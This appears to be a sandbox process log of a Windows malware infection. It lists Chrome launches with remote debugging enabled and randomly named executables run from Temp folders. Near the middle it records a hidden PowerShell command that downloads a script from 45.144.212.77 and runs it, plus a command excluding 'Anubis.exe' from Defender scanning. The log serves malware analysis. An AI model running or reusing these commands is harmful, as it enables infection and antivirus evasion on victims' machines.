"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2640 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2648 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1376 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 --field-trial-handle=1280,i,10435169430612024138,1399626748292755367,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68d9758,0x7fef68d9768,0x7fef68d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2508 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2516 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1112 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3856 --field-trial-handle=1180,i,12408960205609597107,10246717020265409396,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68d9758,0x7fef68d9768,0x7fef68d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1300,i,7948218305668084371,8600038454299709486,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1300,i,7948218305668084371,8600038454299709486,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {79AD6713-47D5-42EE-9EC3-7AB3E0273BDC} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]

C:\ProgramData\mjhhg\ocqhk.exe

C:\ProgramData\mjhhg\ocqhk.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72e9758,0x7fef72e9768,0x7fef72e9778

C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1088 --field-trial-handle=1284,i,12050276980575930812,17576082943080813585,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1284,i,12050276980575930812,17576082943080813585,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1284,i,12050276980575930812,17576082943080813585,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2136 --field-trial-handle=1284,i,12050276980575930812,17576082943080813585,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2680 --field-trial-handle=1284,i,12050276980575930812,17576082943080813585,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2696 --field-trial-handle=1284,i,12050276980575930812,17576082943080813585,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72e9758,0x7fef72e9768,0x7fef72e9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1288,i,10914999586698775445,580840388499851364,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1288,i,10914999586698775445,580840388499851364,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 516

C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 508

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7099758,0x7fef7099768,0x7fef7099778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1088 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2472 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2512 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1432 --field-trial-handle=1272,i,1583718357534038940,4035721344910223679,131072 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1052

C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CB9.tmp\4CBA.tmp\4CBB.bat C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\bIyl6r6e\Anubis.exe""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5129758,0x7fef5129768,0x7fef5129778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1088 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2104 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2656 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2664 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1476 --field-trial-handle=1372,i,10650983715182045743,8465214519311800290,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe

"C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5129758,0x7fef5129768,0x7fef5129778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1292,i,12119687175674520004,2015442246985215973,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1292,i,12119687175674520004,2015442246985215973,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1292,i,12119687175674520004,2015442246985215973,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1292,i,12119687175674520004,2015442246985215973,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1496 --field-trial-handle=1292,i,12119687175674520004,2015442246985215973,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2660 --field-trial-handle=1292,i,12119687175674520004,2015442246985215973,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

